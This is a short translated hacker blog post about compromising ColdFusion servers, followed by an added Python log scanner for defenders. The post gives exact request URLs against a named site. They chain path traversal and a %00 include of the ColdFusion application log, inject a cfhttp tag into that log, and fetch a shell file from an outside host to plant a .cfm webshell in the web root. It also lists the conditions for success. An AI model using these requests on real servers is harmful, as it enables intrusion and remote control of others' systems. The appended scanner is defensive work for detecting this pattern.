1. Read the sensitive metabase.xml / web.xml / password.properties files to find the www path, the ColdFusion path, and the ColdFusion background encryption password.
2. Include the local ColdFusion log with a path-traversal parameter, and get a CFM statement written into that log to obtain a webshell:
http://www.bkjia.com/index.cfm?Action=../../../../../../../../../../CFusionMX7/logs/application.log%00
http://www.bkjia.com/index.cfm?Action=<cfhttp method=Get URL=#URL.u# PATH=#URL.p# FILE=#URL.f#>
http://www.bkjia.com/index.cfm?Action=...\application.log%00&u=http://www.pentest.cc/shell.txt&p=c:\inetpub\wwwroot\&f=shell.cfm
Conditions for success:
1. A writable web directory.
2. The ColdFusion directory and the web directory are on the same partition.
3. A group of cool people
Unsolved problems:
1. IIS logs convert spaces to +. I don't know how to bypass it.
2. ColdFusion doubles both single and double quotation marks. I don't know how to bypass it. (The master also encountered this problem. Haha)
From mickey's blog
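A defender-side addition that is not part of the original post: a small Python scanner over constructed IIS-style log lines that flags the pattern described above (traversal sequences including the ...\ form, the %00 terminator, a ColdFusion tag injected into a parameter, and a .log file named in a .cfm parameter), after undoing URL-encoding and the + that IIS writes in place of spaces. The host, timestamps and sample lines are constructed.

```python
import re
from urllib.parse import unquote

# Constructed IIS-style log lines (hypothetical host, times and paths; not from
# any real log). Line 2 shows IIS recording the spaces of an injected tag as '+'.
SAMPLE_LOG = """\
2008-03-01 10:00:01 GET /index.cfm action=../../../../CFusionMX7/logs/application.log%00 200
2008-03-01 10:00:02 GET /index.cfm action=%3Ccfhttp+method%3DGet+URL%3D%23URL.u%23+PATH%3D%23URL.p%23+FILE%3D%23URL.f%23%3E 200
2008-03-01 10:00:03 GET /index.cfm action=...%5Capplication.log%00&u=http%3A%2F%2Fexample.invalid%2Fs.txt 200
2008-03-01 10:00:04 GET /index.cfm action=home 200
"""

TRAVERSAL = re.compile(r"\.{2,}[\\/]")            # ../  ..\  and the ...\ variant
CF_TAG = re.compile(r"<\s*cf\w+", re.IGNORECASE)   # a ColdFusion tag inside a parameter
LOG_FILE = re.compile(r"\.log\b", re.IGNORECASE)   # a .log file named as an include target


def normalize(query: str) -> str:
    """Undo the '+' IIS writes for spaces and repeated URL-encoding."""
    s = query.replace("+", " ")
    for _ in range(3):                              # tolerate double/triple encoding
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_line(line: str) -> list:
    """Reasons a log line matches the traversal / log-poisoning pattern (empty if clean)."""
    parts = line.split()
    if len(parts) < 5:
        return []
    path, q = parts[3], normalize(parts[4])
    reasons = []
    if TRAVERSAL.search(q):
        reasons.append("path traversal")
    if "\x00" in q:
        reasons.append("null byte")
    if CF_TAG.search(q):
        reasons.append("coldfusion tag in parameter")
    if path.lower().endswith(".cfm") and LOG_FILE.search(q):
        reasons.append("log file referenced in .cfm parameter")
    return reasons


def scan_log(text: str) -> dict:
    """Map 1-based line number to reasons for every flagged line."""
    return {n: r for n, line in enumerate(text.splitlines(), 1) if (r := scan_line(line))}
```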